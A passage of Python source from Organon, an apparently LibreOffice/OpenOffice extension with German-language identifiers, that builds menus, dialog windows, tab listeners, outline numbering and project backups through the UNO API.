'private:graphicrepository/svx/res/apply.png'\n elif item[0] == LANG.GLIEDERUNG and tag3 == 1:\n model_I.ImageURL = 'private:graphicrepository/svx/res/apply.png'\n \n \n elif item[1] == 'Tag_SB':\n \n control.addMouseListener(tag_SB_listener)\n \n panel = self.class_Sidebar.sb_panels2[item[0]]\n \n if panel in self.dict_sb['sichtbare']:\n model_I.ImageURL = 'private:graphicrepository/svx/res/apply.png' \n \n \n\n if xBreite < Breite:\n xBreite = Breite\n \n y += Hoehe\n \n else:\n \n # Waagerechter Trenner\n control, model = self.createControl(self.ctx, \"FixedLine\", 30, y, 50,10,(),())\n model.setPropertyValue('TextColor',102)\n model.setPropertyValue('TextLineColor',102)\n SEPs.append(control)\n y += 10\n\n controls.append((control,item[0]))\n controls.append((control_I,item[0]+'_icon'))\n \n # Senkrechter Trenner\n control, model = self.createControl(self.ctx, \"FixedLine\", 20, 10, 5,y -10 ,(),())\n controls.append((control,''))\n model.Orientation = 1\n \n for sep in SEPs:\n sep.setPosSize(0,0,xBreite ,0,4)\n \n return controls,listener,y - 5,xBreite +20\n except:\n log(inspect.stack,tb())\n \n \n def get_speicherort(self):\n if self.debug: log(inspect.stack)\n \n pfad = os.path.join(self.path_to_extension,'pfade.txt')\n \n if os.path.exists(pfad): \n with codecs_open( pfad, \"r\",\"utf-8\") as file:\n filepath = file.read() \n return filepath\n else:\n return None\n \n def get_Klasse_Baumansicht(self):\n if self.debug: log(inspect.stack)\n\n import baum \n \n for imp in IMPORTS:\n setattr(baum,imp,IMPORTS[imp])\n \n Klasse_Hauptfeld = baum.Baumansicht(self)\n Klasse_Zeilen_Listener = baum.Zeilen_Listener(self.ctx,self)\n return Klasse_Hauptfeld,Klasse_Zeilen_Listener\n\n def lade_modul(self,modul,arg = None): \n if self.debug: log(inspect.stack)\n \n try: \n# if load_reload:\n# load_reload_modul(modul,pyPath,self)\n \n mod = __import__(modul)\n \n for imp in IMPORTS:\n setattr(mod,imp,IMPORTS[imp])\n\n if arg == None:\n return mod\n else: \n oClass = getattr(mod, arg)\n return oClass(self)\n except:\n log(inspect.stack,tb())\n \n \n def lade_Modul_Language(self):\n if self.debug: log(inspect.stack)\n \n language = self.doc.CharLocale.Language\n \n if language not in ('de'):\n language = 'en'\n \n self.language = language\n \n try:\n lang = __import__('lang_'+language)\n except:\n lang = __import__('lang_en')\n\n return lang\n \n def lade_RawInputReader(self):\n if self.debug: log(inspect.stack)\n \n if self.platform != 'win32':\n return None\n \n import rawinputdata\n \n if load_reload:\n # reload laedt nur rawinputdata. 
Aenderungen in\n # RawInputReader werden nicht neu geladen.\n # \n # Die Methode lade_modul funktionierte ebenfalls nicht,\n # da bei erneutem Oeffnen von Organon die globalen Variablen\n # alle auf None gesetzt sind.\n #\n # Keine Idee fuer eine Loesung bis jetzt\n if self.programm == 'OpenOffice':\n reload(rawinputdata)\n \n return rawinputdata.RawInputReader\n \n \n def Test(self):\n try:\n self.class_Projekt.test()\n except:\n log(inspect.stack,tb())\n \n \n def leere_Papierkorb(self):\n if self.debug: log(inspect.stack)\n \n self.class_Baumansicht.leere_Papierkorb() \n \n def erzeuge_Backup(self):\n if self.debug: log(inspect.stack)\n \n try:\n pfad_zu_backup_ordner = os.path.join(self.pfade['projekt'],'Backups')\n if not os.path.exists(pfad_zu_backup_ordner):\n os.makedirs(pfad_zu_backup_ordner)\n \n lt = time.localtime()\n t = time.strftime(\" %d.%m.%Y %H.%M.%S\", lt)\n \n neuer_projekt_name = self.projekt_name + t\n pfad_zu_neuem_ordner = os.path.join(pfad_zu_backup_ordner,neuer_projekt_name)\n \n tree = copy.deepcopy(self.props['Projekt'].xml_tree)\n root = tree.getroot()\n \n all_elements = root.findall('.//')\n ordinale = []\n \n for el in all_elements:\n ordinale.append(el.tag) \n \n self.class_Export.kopiere_projekt(neuer_projekt_name,pfad_zu_neuem_ordner,\n ordinale,tree,self.dict_sb_content,True) \n os.rename(pfad_zu_neuem_ordner,pfad_zu_neuem_ordner+'.organon') \n self.nachricht('Backup erzeugt unter: %s' %pfad_zu_neuem_ordner+'.organon', \"infobox\") \n except:\n log(inspect.stack,tb())\n \n \n def debug_time(self):\n zeit = \"%0.2f\" %(self.time.clock()-self.timer_start)\n return zeit\n\n def entferne_alle_listener(self):\n if self.debug: log(inspect.stack)\n \n #return\n self.current_Contr.removeSelectionChangeListener(self.VC_selection_listener) \n self.current_Contr.removeKeyHandler(self.keyhandler)\n self.dialog.removeWindowListener(self.w_listener)\n self.undo_mgr.removeUndoManagerListener(self.undo_mgr_listener)\n \n# del(self.menu_start)\n# del(self)\n \n def erzeuge_Dialog_Container(self,posSize,Flags=1+32+64+128,parent=None):\n if self.debug: log(inspect.stack)\n \n ctx = self.ctx\n smgr = self.smgr\n \n X,Y,Width,Height = posSize\n \n if parent == None:\n parent = self.topWindow \n \n toolkit = smgr.createInstanceWithContext(\"com.sun.star.awt.Toolkit\", ctx) \n oCoreReflection = smgr.createInstanceWithContext(\"com.sun.star.reflection.CoreReflection\", ctx)\n \n # Create Uno Struct\n oXIdlClass = oCoreReflection.forName(\"com.sun.star.awt.WindowDescriptor\")\n oReturnValue, oWindowDesc = oXIdlClass.createObject(None)\n # global oWindow\n oWindowDesc.Type = uno.Enum(\"com.sun.star.awt.WindowClass\", \"TOP\")\n oWindowDesc.WindowServiceName = \"\"\n oWindowDesc.Parent = parent\n oWindowDesc.ParentIndex = -1\n oWindowDesc.WindowAttributes = Flags # Flags fuer com.sun.star.awt.WindowAttribute\n \n oXIdlClass = oCoreReflection.forName(\"com.sun.star.awt.Rectangle\")\n oReturnValue, oRect = oXIdlClass.createObject(None)\n oRect.X = X\n oRect.Y = Y\n oRect.Width = Width \n oRect.Height = Height \n \n oWindowDesc.Bounds = oRect\n \n # create window\n oWindow = toolkit.createWindow(oWindowDesc)\n \n # create frame for window\n oFrame = smgr.createInstanceWithContext(\"com.sun.star.frame.Frame\",ctx)\n oFrame.initialize(oWindow)\n oFrame.setCreator(self.desktop)\n oFrame.activate()\n oFrame.Name = 'Xaver' # no effect\n oFrame.Title = 'Xaver2' # no effect\n # create new control container\n cont = smgr.createInstanceWithContext(\"com.sun.star.awt.UnoControlContainer\", 
ctx)\n cont_model = smgr.createInstanceWithContext(\"com.sun.star.awt.UnoControlContainerModel\", ctx)\n cont_model.BackgroundColor = KONST.FARBE_ORGANON_FENSTER # 9225984\n #pd()\n #cont_model.ForegroundColor = KONST.FARBE_SCHRIFT_DATEI\n cont.setModel(cont_model)\n # need createPeer just only the container\n cont.createPeer(toolkit, oWindow)\n #cont.setPosSize(0, 0, 0, 0, 15)\n\n oFrame.setComponent(cont, None)\n cont.Model.Text = 'Gabriel' \n \n # PosSize muss erneut gesetzt werden, um die Anzeige zu erneuern,\n # sonst bleibt ein Teil des Fensters schwarz\n oWindow.setPosSize(0,0,Width,Height,12)\n \n return oWindow,cont\n \n \n def erzeuge_fensterinhalt(self,controls):\n # Controls und Models erzeugen\n pos_y = 0\n ctrls = {}\n \n pos_y_max = [0]\n \n for ctrl in controls:\n if isinstance(ctrl,int):\n pos_y += ctrl\n elif 'Y=' in ctrl:\n pos_y_max.append(pos_y)\n pos_y = int(ctrl.split('Y=')[1])\n else:\n name,unoCtrl,X,Y,width,height,prop_names,prop_values,extras = ctrl\n locals()[name],locals()[name.replace('control','model')] = self.createControl(self.ctx,unoCtrl,X,pos_y+Y,width,height,prop_names,prop_values)\n \n if 'calc' in name:\n w,h = self.kalkuliere_und_setze_Control(locals()[name],'w')\n \n \n if 'setActionCommand' in extras:\n locals()[name].setActionCommand(extras['setActionCommand'])\n if 'addItems' in extras:\n locals()[name].addItems(extras['addItems'],0)\n if 'Enable' in extras:\n locals()[name].Enable = extras['Enable']\n if 'addActionListener' in extras:\n for l in extras['addActionListener']:\n locals()[name].addActionListener(l)\n if 'addKeyListener' in extras:\n locals()[name].addKeyListener(extras['addKeyListener'])\n if 'addMouseListener' in extras:\n locals()[name].addMouseListener(extras['addMouseListener'])\n if 'addItemListener' in extras:\n locals()[name].addItemListener(extras['addItemListener']) \n if 'SelectedItems' in extras:\n locals()[name].Model.SelectedItems = extras['SelectedItems']\n \n ctrls.update({name:locals()[name]}) \n \n pos_y_max.append(pos_y)\n return ctrls,max(pos_y_max)\n \n def erzeuge_Scrollbar(self,fenster_cont,PosSize,control_innen):\n if self.debug: log(inspect.stack)\n \n PosX,PosY,Width,Height = PosSize\n Width = 20\n \n control, model = self.createControl(self.ctx,\"ScrollBar\",PosX,PosY,Width,Height,(),() ) \n model.Orientation = 1\n model.LiveScroll = True \n model.ScrollValueMax = control_innen.PosSize.Height/4 \n \n control.LineIncrement = fenster_cont.PosSize.Height/Height*50\n control.BlockIncrement = 200\n control.Maximum = control_innen.PosSize.Height \n control.VisibleSize = fenster_cont.PosSize.Height - 40 \n\n listener = self.Listener['ScrollBar'](self.debug,control_innen)\n control.addAdjustmentListener(listener) \n \n fenster_cont.addControl('ScrollBar',control) \n\n return control \n \n def loesche_undo_Aktionen(self):\n if self.debug: log(inspect.stack)\n \n undoMgr = self.doc.UndoManager\n undoMgr.reset()\n \n def speicher_settings(self,dateiname,eintraege):\n if self.debug: log(inspect.stack)\n \n path = os.path.join(self.pfade['settings'],dateiname)\n imp = pformat(eintraege)\n \n with open(path , \"w\") as file:\n file.write(imp)\n \n def tree_write(self,tree,pfad): \n if self.debug: log(inspect.stack) \n # diese Methode existiert, um alle Schreibvorgaenge\n # des XML_trees bei Bedarf kontrollieren zu koennen\n tree.write(pfad)\n \n def prettyprint(self,pfad,oObject,w=600):\n \n from pprint import pformat\n imp = pformat(oObject,width=w)\n with codecs_open(pfad , \"w\",'utf-8') as file:\n file.write(imp)\n 
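# hypothetical usage sketch (path is illustrative only): self.prettyprint('/tmp/dump.txt', self.props, w=120) writes a pretty-printed repr of any object for inspection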
\n\n def oeffne_dokument_in_neuem_fenster(self,URL):\n if self.debug: log(inspect.stack)\n \n self.new_doc = self.doc.CurrentController.Frame.loadComponentFromURL(URL,'_blank',0,())\n \n contWin = self.new_doc.CurrentController.Frame.ContainerWindow \n contWin.setPosSize(0,0,870,900,12)\n \n lmgr = self.new_doc.CurrentController.Frame.LayoutManager\n for elem in lmgr.Elements:\n \n if lmgr.isElementVisible(elem.ResourceURL):\n lmgr.hideElement(elem.ResourceURL)\n \n lmgr.HideCurrentUI = True \n \n viewSettings = self.new_doc.CurrentController.ViewSettings\n viewSettings.ZoomType = 3\n viewSettings.ZoomValue = 100\n viewSettings.ShowRulers = False\n \n def kalkuliere_und_setze_Control(self,ctrl,h_or_w = None):\n #if self.debug: log(inspect.stack)\n \n prefSize = ctrl.getPreferredSize()\n Hoehe = prefSize.Height \n Breite = prefSize.Width #+10\n \n if h_or_w == None:\n ctrl.setPosSize(0,0,Breite,Hoehe,12)\n elif h_or_w == 'h':\n ctrl.setPosSize(0,0,0,Hoehe,8)\n elif h_or_w == 'w':\n ctrl.setPosSize(0,0,Breite,0,4)\n \n return Breite,Hoehe\n \n \n # Handy function provided by hanya (from the OOo forums) to create a control, model.\n def createControl(self,ctx,type,x,y,width,height,names,values):\n try:\n #smgr = ctx.getServiceManager()\n ctrl = self.smgr.createInstanceWithContext(\"com.sun.star.awt.UnoControl%s\" % type,ctx)\n ctrl_model = self.smgr.createInstanceWithContext(\"com.sun.star.awt.UnoControl%sModel\" % type,ctx)\n ctrl_model.setPropertyValues(names,values)\n ctrl.setModel(ctrl_model)\n ctrl.setPosSize(x,y,width,height,15)\n return (ctrl, ctrl_model)\n except:\n log(inspect.stack,tb())\n \n \n def createUnoService(self,serviceName):\n sm = uno.getComponentContext().ServiceManager\n return sm.createInstanceWithContext(serviceName, uno.getComponentContext())\n \n def erzeuge_texttools_fenster(self,ev,m_win):\n \n loc_menu = ev.Source.Context.AccessibleContext.LocationOnScreen\n loc_cont = self.current_Contr.Frame.ContainerWindow.AccessibleContext.LocationOnScreen\n \n x3 = loc_menu.X - loc_cont.X # Position des Dropdown Menus\n y3 = loc_menu.Y - loc_cont.Y # Position des Dropdown Menus\n \n x3 += ev.Source.Context.PosSize.Width\n y3 += ev.Source.PosSize.Y\n \n items = menuEintraege(LANG,LANG.TEXTTOOLS)\n \n controls,listener,Hoehe,Breite = self.erzeuge_Menu_DropDown_Eintraege(items)\n controls = list((x,'') for x in controls)\n \n posSize = x3+2,y3,Breite +20,Hoehe +20\n win,cont = self.erzeuge_Dialog_Container(posSize,Flags=1+512)\n \n # Listener fuers Dispose des Fensters\n listener2 = Schliesse_Menu_Listener(self,texttools=True)\n cont.addMouseListener(listener2) \n listener2.ob = win\n \n listener.window = win\n listener.texttools = True\n #pd()\n listener.win2 = m_win\n \n for c in controls:\n cont.addControl(c[1],c[0])\n \n\n\nclass Props():\n def __init__(self):\n if debug: log(inspect.stack)\n \n self.dict_zeilen_posY = {}\n self.dict_ordner = {} # enthaelt alle Ordner und alle ihnen untergeordneten Zeilen\n self.dict_bereiche = {} # drei Unterdicts: Bereichsname,ordinal,Bereichsname-ordinal\n \n self.Hauptfeld = None # alle Zeilen, Controls\n self.sichtbare_bereiche = [] # Bereichsname ('OrganonSec'+ nr)\n self.kommender_Eintrag = 0\n self.selektierte_zeile = None # ordinal des Zeilencontainers\n self.selektierte_zeile_alt = None # control 'textfeld' der Zeile\n self.Papierkorb = None # ordinal des Papierkorbs - wird anfangs einmal gesetzt und bleibt konstant \n self.Projektordner = None # ordinal des Projektordners - wird anfangs einmal gesetzt und bleibt konstant \n 
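# mapping shape, per the usages in the listeners below: dict_bereiche['ordinal'][zeilen_ordinal] -> Bereichsname, dict_bereiche['Bereichsname'][name] -> file path, dict_bereiche['Bereichsname-ordinal'][name] -> zeilen_ordinal\n        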
self.Papierkorb_geleert = False\n self.tastatureingabe = False\n self.zuletzt_gedrueckte_taste = None\n\n self.xml_tree = None\n \n self.tab_auswahl = Tab_Auswahl()\n \n\ndef menuEintraege(LANG,menu):\n \n if menu == LANG.FILE:\n \n items = (LANG.NEW_PROJECT, \n LANG.OPEN_PROJECT ,\n 'SEP', \n LANG.NEW_DOC, \n LANG.NEW_DIR,\n 'SEP',\n LANG.EXPORT_2, \n LANG.IMPORT_2,\n 'SEP',\n LANG.BACKUP,\n LANG.EINSTELLUNGEN)\n \n if T.AB != 'Projekt':\n items = (\n LANG.EXPORT_2, \n 'SEP',\n LANG.BACKUP,\n LANG.EINSTELLUNGEN)\n \n elif menu == LANG.BEARBEITEN_M:\n items = ( \n LANG.ORGANIZER,\n LANG.NEUER_TAB,\n 'SEP',\n LANG.TRENNE_TEXT,\n LANG.TEXTTOOLS,\n 'SEP',\n LANG.UNFOLD_PROJ_DIR,\n LANG.CLEAR_RECYCLE_BIN\n )\n if T.AB != 'Projekt':\n items = ( \n LANG.ORGANIZER,\n 'SEP',\n LANG.NEUER_TAB,\n LANG.SCHLIESSE_TAB,\n LANG.IMPORTIERE_IN_TAB,\n 'SEP',\n #LANG.TEXTVERGLEICH,\n #LANG.WOERTERLISTE,\n LANG.TEXTTOOLS,\n 'SEP',\n LANG.UNFOLD_PROJ_DIR,\n LANG.CLEAR_RECYCLE_BIN\n ) \n \n elif menu == LANG.ANSICHT:\n items = ((LANG.SICHTBARE_TAGS_BAUMANSICHT,'Ueberschrift'),\n (LANG.SHOW_TAG1,'Tag_TV'),\n (LANG.SHOW_TAG2,'Tag_TV'),\n (LANG.GLIEDERUNG,'Tag_TV'),\n ('SEP',''),\n (LANG.SICHTBARE_TAGS_SEITENLEISTE,'Ueberschrift'),\n (LANG.SYNOPSIS,'Tag_SB'),\n (LANG.NOTIZEN,'Tag_SB'),\n (LANG.BILDER,'Tag_SB'),\n (LANG.ALLGEMEIN,'Tag_SB'),\n (LANG.CHARAKTERE,'Tag_SB'),\n (LANG.ORTE,'Tag_SB'),\n (LANG.OBJEKTE,'Tag_SB'),\n (LANG.ZEIT,'Tag_SB'),\n (LANG.BENUTZER1,'Tag_SB'),\n (LANG.BENUTZER2,'Tag_SB'),\n (LANG.BENUTZER3,'Tag_SB'),\n ('SEP',''),\n (LANG.ZEIGE_TEXTBEREICHE,''),\n ('SEP',''),\n (LANG.HOMEPAGE,''),\n (LANG.FEEDBACK,''),\n )\n \n elif menu == LANG.TEXTTOOLS:\n items = (LANG.TEXTVERGLEICH,\n LANG.WOERTERLISTE,\n LANG.ERZEUGE_INDEX\n )\n \n return items\n\n\nclass Tab_Auswahl():\n def __init__(self):\n if debug: log(inspect.stack)\n \n self.rb = None\n self.eigene_auswahl = None\n self.eigene_auswahl_use = None\n \n self.seitenleiste_use = None\n self.seitenleiste_log = None\n self.seitenleiste_log_tags = None\n self.seitenleiste_tags = None\n \n self.baumansicht_use = None\n self.baumansicht_log = None\n self.baumansicht_tags = None\n \n self.suche_use = None\n self.suche_log = None\n self.suche_term = None\n \n self.behalte_hierarchie_bei = None\n self.tab_name = None\n \n \n \n\nclass Tab ():\n def __init__(self):\n if debug: log(inspect.stack)\n self.AB = 'Projekt'\n \n\nclass Design():\n \n def __init__(self):\n if debug: log(inspect.stack)\n \n self.default_tab = {}\n self.custom_tab = {}\n self.tabs = {}\n self.new_tabs = {}\n \n \n def set_default(self,tabs):\n if debug: log(inspect.stack)\n \n summe = 0\n i = 0\n for tab in tabs:\n self.default_tab.update({'tab%sx'%(i):tab})\n self.custom_tab.update({'tab%sx'%(i):0})\n \n summe = 0\n for j in range(i+1):\n summe += self.default_tab['tab%sx'%(j)]\n \n self.tabs.update({'tab%sx'%(i):summe})\n\n i += 1\n \n \n def setze_tab(self,tab_name,value): \n \n for x in tab_name:\n if x.isdigit():\n break\n \n x = int(x)\n \n if self.custom_tab['tab%sx'%(x+1)] < value:\n if value > self.default_tab['tab%sx'%(x+1)]:\n self.custom_tab['tab%sx'%(x+1)] = value\n \n \n def kalkuliere_tabs(self):\n if debug: log(inspect.stack)\n \n self.new_tabs = {}\n \n for i in range(len(self.custom_tab)):\n summe = 0\n for j in range(i+1):\n if self.custom_tab['tab%sx'%(j)] != 0:\n summe += self.custom_tab['tab%sx'%(j)]\n else:\n summe += self.default_tab['tab%sx'%(j)]\n self.new_tabs.update( {'tab%sx'%(i) : summe} )\n self.new_tabs.update( {'tab%s'%(i) : summe} )\n\nclass 
Gliederung():\n def rechne(self,tree): \n if debug: log(inspect.stack)\n \n root = tree.getroot()\n all_elem = root.findall('.//')\n \n self.lvls = {}\n for i in range(10):\n self.lvls.update({i: 0})\n\n gliederung = {}\n lvl = 1\n \n for el in all_elem:\n \n lvl_el = int(el.attrib['Lvl']) + 1\n \n if lvl_el == lvl:\n self.lvls[lvl] += 1\n elif lvl_el > lvl:\n self.lvls[lvl+1] += 1\n lvl += 1\n elif lvl_el < lvl:\n self.lvls[lvl_el] += 1\n lvl = lvl_el #self.lvls[lvl_el]\n for i in range(lvl,10):\n self.lvls[i+1] = 0\n \n glied = ''\n for l in range(lvl_el):\n glied = glied + str(self.lvls[l+1]) + '.'\n \n gliederung.update({el.tag:glied})\n\n return gliederung \n \n \nfrom com.sun.star.awt import XTabListener\nclass Tab_Listener(unohelper.Base,XTabListener):\n \n def __init__(self,mb):\n if mb.debug: log(inspect.stack)\n \n self.mb = mb\n # Obwohl der Tab_Listener nur einmal gesetzt wird, wird activated immer 2x aufgerufen (Bug?)\n # Um den Code nicht doppelt auszufuehren, wird id_old verwendet\n self.id_old = None\n \n\n def inserted(self,id):return False\n def removed(self,id):return False\n def changed(self,id):return False\n def activated(self,id):\n if self.mb.debug: log(inspect.stack)\n \n # activated wird beim Erzeugen eines neuen tabs\n # gerufen, bevor self.mb.tabs gesetzt wurde. Daher hier try/except\n # T.AB wird stattdessen in erzeuge_neuen_tab() gesetzt \n \n try:\n if id != self.id_old:\n \n if self.mb.props[T.AB].tastatureingabe:\n tab_name = self.mb.tabs[self.mb.tab_id_old][1]\n \n ordinal = self.mb.props[tab_name].selektierte_zeile\n bereichsname = self.mb.props[T.AB].dict_bereiche['ordinal'][ordinal]\n\n path = uno.systemPathToFileUrl(self.mb.props[T.AB].dict_bereiche['Bereichsname'][bereichsname])\n\n self.mb.class_Bereiche.datei_nach_aenderung_speichern(path,bereichsname) \n self.mb.props[T.AB].tastatureingabe = False\n\n self.mb.active_tab_id = id\n sichtbare_bereiche = self.mb.props['Projekt'].sichtbare_bereiche\n try:\n # Wenn neuer Tab erzeugt wird, wird hier ein Fehler erzeugt.\n # Ist aber egal\n T.AB = self.mb.tabs[id][1]\n except:\n pass\n self.mb.props['Projekt'].sichtbare_bereiche = sichtbare_bereiche\n self.mb.class_Zeilen_Listener.schalte_sichtbarkeit_der_Bereiche()\n\n if self.mb.props[T.AB].selektierte_zeile_alt != None:\n ctrl_alt = self.mb.props[T.AB].Hauptfeld.getControl(self.mb.props[T.AB].selektierte_zeile_alt).getControl('textfeld')\n self.mb.class_Sidebar.passe_sb_an(ctrl_alt)\n \n \n self.id_old = id\n except:\n log(inspect.stack,tb())\n\n \n def deactivated(self,id):\n if self.mb.debug: log(inspect.stack)\n \n self.mb.tab_id_old = id\n return False\n def disposing(self,arg):return False\n \n\nfrom com.sun.star.awt import XMouseListener, XItemListener\nfrom com.sun.star.awt.MouseButton import LEFT as MB_LEFT \n \nclass Menu_Leiste_Listener (unohelper.Base, XMouseListener):\n def __init__(self,mb):\n if mb.debug: log(inspect.stack)\n \n self.mb = mb\n self.menu_Kopf_Eintrag = 'None'\n self.mb.geoeffnetesMenu = None\n \n def mousePressed(self, ev):\n if ev.Buttons == MB_LEFT:\n if self.mb.debug: log(inspect.stack)\n try:\n controls = []\n \n if self.menu_Kopf_Eintrag == 'Test':\n self.mb.Test() \n return\n \n else:\n items = menuEintraege(LANG,self.menu_Kopf_Eintrag)\n if self.menu_Kopf_Eintrag == LANG.ANSICHT:\n controls,listener,Hoehe,Breite = self.mb.erzeuge_Menu_DropDown_Eintraege_Ansicht(items)\n else:\n controls,listener,Hoehe,Breite = self.mb.erzeuge_Menu_DropDown_Eintraege(items)\n controls = list((x,'') for x in controls)\n\n loc_cont = 
self.mb.current_Contr.Frame.ContainerWindow.AccessibleContext.LocationOnScreen\n \n x = self.mb.dialog.AccessibleContext.LocationOnScreen.X - loc_cont.X + ev.Source.PosSize.X\n y = self.mb.dialog.AccessibleContext.LocationOnScreen.Y - loc_cont.Y + ev.Source.PosSize.Y + 20\n posSize = x,y,Breite +20,Hoehe +20\n\n oWindow,cont = self.mb.erzeuge_Dialog_Container(posSize,1+512)\n\n # Listener fuers Dispose des Fensters\n listener2 = Schliesse_Menu_Listener(self.mb)\n cont.addMouseListener(listener2) \n listener2.ob = oWindow\n \n\n self.mb.geoeffnetesMenu = self.menu_Kopf_Eintrag\n listener.window = oWindow\n self.mb.menu_fenster = oWindow \n \n for c in controls:\n cont.addControl(c[1],c[0])\n except:\n log(inspect.stack,tb())\n \n\n def mouseEntered(self, ev):\n if self.mb.debug: log(inspect.stack)\n \n ev.value.Source.Model.FontUnderline = 1 \n if self.menu_Kopf_Eintrag != ev.value.Source.Text:\n self.menu_Kopf_Eintrag = ev.value.Source.Text \n if None not in (self.menu_Kopf_Eintrag,self.mb.geoeffnetesMenu):\n if self.menu_Kopf_Eintrag != self.mb.geoeffnetesMenu:\n self.mb.menu_fenster.dispose()\n \n return False\n \n def mouseExited(self, ev): \n if self.mb.debug: log(inspect.stack)\n \n ev.value.Source.Model.FontUnderline = 0\n return False\n def mouseReleased(self,ev):\n return False\n def disposing(self,ev):\n return False\n\nclass Menu_Leiste_Listener2 (unohelper.Base, XMouseListener):\n def __init__(self,mb):\n if mb.debug: log(inspect.stack)\n \n self.mb = mb\n self.geklickterMenupunkt = None\n \n def mousePressed(self, ev):\n if self.mb.debug: log(inspect.stack)\n \n if ev.Buttons == 1:\n if self.mb.debug: log(inspect.stack)\n \n if self.mb.projekt_name != None:\n \n if ev.Source.Model.HelpText == LANG.INSERT_DOC: \n self.mb.class_Baumansicht.erzeuge_neue_Zeile('dokument')\n \n if ev.Source.Model.HelpText == LANG.INSERT_DIR: \n self.mb.class_Baumansicht.erzeuge_neue_Zeile('Ordner')\n \n if ev.Source.Model.HelpText[:10] == LANG.FORMATIERUNG_SPEICHERN[:10]:\n\n props = self.mb.props[T.AB]\n zuletzt = props.selektierte_zeile_alt\n bereichsname = props.dict_bereiche['ordinal'][zuletzt]\n path = props.dict_bereiche['Bereichsname'][bereichsname]\n self.mb.props[T.AB].tastatureingabe = True\n\n self.mb.class_Bereiche.datei_nach_aenderung_speichern(uno.systemPathToFileUrl(path),bereichsname)\n\n self.mb.loesche_undo_Aktionen()\n return False\n \n def mouseExited(self,ev):\n return False\n def mouseEntered(self,ev):\n if ev.Source.Model.HelpText[:10] == LANG.FORMATIERUNG_SPEICHERN[:10]:\n ev.Source.Model.HelpText = LANG.FORMATIERUNG_SPEICHERN.format(self.get_zuletzt_benutzte_datei())\n \n def mouseReleased(self,ev):\n return False\n def disposing(self,ev):\n return False\n \n def get_zuletzt_benutzte_datei(self):\n if self.mb.debug: log(inspect.stack)\n try:\n props = self.mb.props[T.AB]\n zuletzt = props.selektierte_zeile_alt\n xml = props.xml_tree\n root = xml.getroot()\n return root.find('.//' + zuletzt).attrib['Name']\n except:\n return 'None'\n\nclass Auswahl_Menu_Eintrag_Listener(unohelper.Base, XMouseListener):\n def __init__(self,mb):\n if mb.debug: log(inspect.stack)\n \n self.mb = mb\n self.window = None\n # Wenn dieser Listener von den Texttools aus gerufen wird,\n # wird win2 auf das normale Menufenster gesetzt und disposiert\n self.texttools = False\n self.win2 = None\n \n def mousePressed(self, ev):\n if self.mb.debug: log(inspect.stack) \n try:\n sel = ev.Source.Text\n if sel not in [LANG.TEXTTOOLS,]:\n self.do()\n\n if sel == LANG.NEW_PROJECT:\n 
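# dispatch: each menu label maps to exactly one handler; for all entries except LANG.TEXTTOOLS the dropdown window was already disposed in self.do() above\n                    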
self.mb.class_Projekt.erzeuge_neues_Projekt()\n \n elif sel == LANG.OPEN_PROJECT:\n self.mb.class_Projekt.lade_Projekt()\n \n elif sel == LANG.NEW_DOC:\n self.mb.class_Baumansicht.erzeuge_neue_Zeile('dokument')\n \n elif sel == LANG.NEW_DIR:\n self.mb.class_Baumansicht.erzeuge_neue_Zeile('Ordner')\n \n elif sel == LANG.EXPORT_2:\n self.mb.class_Export.export()\n \n elif sel == LANG.IMPORT_2:\n self.mb.class_Import.importX()\n \n elif sel == LANG.UNFOLD_PROJ_DIR:\n self.mb.class_Funktionen.projektordner_ausklappen()\n \n elif sel == LANG.NEUER_TAB:\n self.mb.class_Tabs.start(False)\n \n elif sel == LANG.SCHLIESSE_TAB:\n self.mb.class_Tabs.schliesse_Tab()\n \n elif sel == LANG.ZEIGE_TEXTBEREICHE:\n oBool = self.mb.current_Contr.ViewSettings.ShowTextBoundaries\n self.mb.current_Contr.ViewSettings.ShowTextBoundaries = not oBool \n \n elif sel == LANG.HOMEPAGE:\n webbrowser.open('https://github.com/XRoemer/Organon')\n \n elif sel == LANG.FEEDBACK:\n webbrowser.open('http://organon4office.wordpress.com/')\n \n elif sel == LANG.BACKUP:\n self.mb.erzeuge_Backup()\n \n elif sel == LANG.TRENNE_TEXT:\n self.mb.class_Funktionen.teile_text()\n \n elif sel == LANG.IMPORTIERE_IN_TAB:\n self.mb.class_Tabs.start(True)\n \n elif sel == LANG.CLEAR_RECYCLE_BIN: \n self.mb.leere_Papierkorb()\n \n elif sel == LANG.TRENNER: \n self.mb.erzeuge_Trenner_Enstellungen()\n \n elif sel == LANG.TEXTVERGLEICH: \n self.mb.class_Zitate.start()\n \n elif sel == LANG.TEXTTOOLS: \n self.mb.texttools_geoeffnet = True\n self.mb.erzeuge_texttools_fenster(ev,self.window)\n \n elif sel == LANG.WOERTERLISTE: \n self.mb.class_werkzeug_wListe.start()\n \n elif sel == LANG.ERZEUGE_INDEX: \n self.mb.class_Index.start()\n \n elif sel == LANG.EINSTELLUNGEN:\n self.mb.class_Einstellungen.start()\n \n elif sel == LANG.ORGANIZER:\n self.mb.class_Organizer.run()\n \n self.mb.loesche_undo_Aktionen()\n except:\n log(inspect.stack,tb())\n \n def do(self): \n if self.mb.debug: log(inspect.stack)\n self.window.dispose()\n self.mb.geoeffnetesMenu = None\n # damit der Zeilen_Listener nicht auf mouse_released reagiert,\n # wenn das fenster geschlossen wird\n self.mb.class_Zeilen_Listener.menu_geklickt = True\n if self.texttools:\n self.texttools = False\n self.win2.dispose()\n self.mb.texttools_geoeffnet = False\n\n def mouseExited(self,ev):\n ev.value.Source.Model.FontWeight = 100\n return False\n def mouseEntered(self,ev):\n ev.value.Source.Model.FontWeight = 150\n return False\n def mouseReleased(self,ev):\n return False\n def disposing(self,ev):\n return False\n \n \nclass Schliesse_Menu_Listener (unohelper.Base, XMouseListener):\n def __init__(self,mb,texttools=False):\n if mb.debug: log(inspect.stack)\n \n self.ob = None\n self.mb = mb\n self.texttools = texttools\n \n def mousePressed(self, ev):\n return False\n \n def mouseExited(self, ev): \n if self.mb.debug: log(inspect.stack)\n \n #print('texttools',self.mb.texttools_geoeffnet,self.texttools)\n \n if self.mb.texttools_geoeffnet and self.texttools == False:\n return\n\n point = uno.createUnoStruct('com.sun.star.awt.Point')\n point.X = ev.X\n point.Y = ev.Y\n\n enthaelt_Punkt = ev.Source.AccessibleContext.containsPoint(point)\n\n if not enthaelt_Punkt: \n self.ob.dispose() \n self.mb.geoeffnetesMenu = None \n \n if self.texttools:\n self.mb.texttools_geoeffnet = False\n \n return False\n \n\n def mouseEntered(self,ev):\n return False\n def mouseReleased(self,ev):\n return False\n def disposing(self,ev):\n return False\n\n\nclass DropDown_Tags_TV_Listener(unohelper.Base, XMouseListener):\n 
